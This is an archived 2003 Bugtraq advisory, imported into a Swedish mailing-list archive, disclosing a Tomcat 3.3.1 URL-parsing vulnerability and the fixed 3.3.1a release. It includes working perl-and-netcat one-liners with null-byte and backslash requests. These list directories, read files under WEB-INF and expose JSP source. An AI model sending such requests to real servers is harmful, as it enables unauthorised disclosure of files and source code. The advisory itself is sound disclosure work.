linux, säkerhet

89363 2003-01-30  18:49  /83 rader/ Jouko Pynnonen <jouko@solutions.fi>
Importerad: 2003-01-30  18:49  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <3316>
Ärende: Apache Jakarta Tomcat 3 URL parsing vulnerability
------------------------------------------------------------



OVERVIEW
========

Tomcat is a JSP/Servlet implementation developed at the Apache
Software  Foundation. Tomcat versions 3.3.1 and earlier contain some
security  vulnerabilities which allow a remote user to retrieve
listings of   directories despite index.html or index.jsp files. It
is also possible  to retrieve contents of files and directories that
shouldn't be visible to  outside. The vulnerability also allows
retrieving the source of JSP files.



DETAILS
=======

Certain kinds of HTTP requests containing binary null or backslash 
characters are parsed incorrectly by Tomcat's built-in web server. The 
following GET request causes Tomcat to output the directory listing of 
the web root under default installation:

GET /<null byte>.jsp HTTP/1.0

The following UNIX command can be issued to test the vulnerability:

$ perl -e 'print "GET /\x00.jsp HTTP/1.0\r\n\r\n";' | nc my.server
8080

If your server is vulnerable, the command will output a HTTP header
and  the directory listing even if there's an index file
present. Furthermore,  a backslash can be used in the following way
to get information from  otherwise inaccessible directories:

$ perl -e 'print "GET
/admin/WEB-INF\\classes/ContextAdmin.java\x00.jsp
HTTP/1.0\r\n\r\n";'|nc my.server 8080

This will output the contents of ContextAdmin.java.

The servlet engine interprets the directory listing and any file
retrieved in this way as a JSP page, which might be exploited to run
arbitrary Java code under some imaginable scenarios. If the attacker
can  create a file whose name contains JSP tags somewhere under the
web root,  the code would be run when the directory listing is
fetched in the way  described above. Similarly Java code embedded in
*.html or any other file  can be compiled and run by an attacker.

In the same way a remote user may force a *.jsp file to be
interpreted as  plain HTML, ie. retrieve the source of JSP files:

$ perl -e 'print "GET /examples/jsp/cal/cal1.jsp\x00.html
HTTP/1.0\r\n\r\n";'|nc my.server 8080

This would output the source of the example JSP file.



SOLUTION
========

The vendor was informed on January 10, 2003. A new version of Tomcat
addressing this problem has been released. The fixed version 3.3.1a
and  additional information is available at

  http://jakarta.apache.org/builds/jakarta-tomcat/release/v3.3.1a/

According to the vendor, the problem only affects Tomcat used with JDK 
1.3.1 or earlier.



CREDITS
=======

The vulnerability was discovered by Jouko Pynnönen of Online Solutions 
Ltd, Finland.



-- 
Jouko Pynnonen          Online Solutions Ltd       Secure your Linux -
jouko@solutions.fi      http://www.solutions.fi    http://www.secmod.com
(89363) /Jouko Pynnonen <jouko@solutions.fi>/(Ombruten)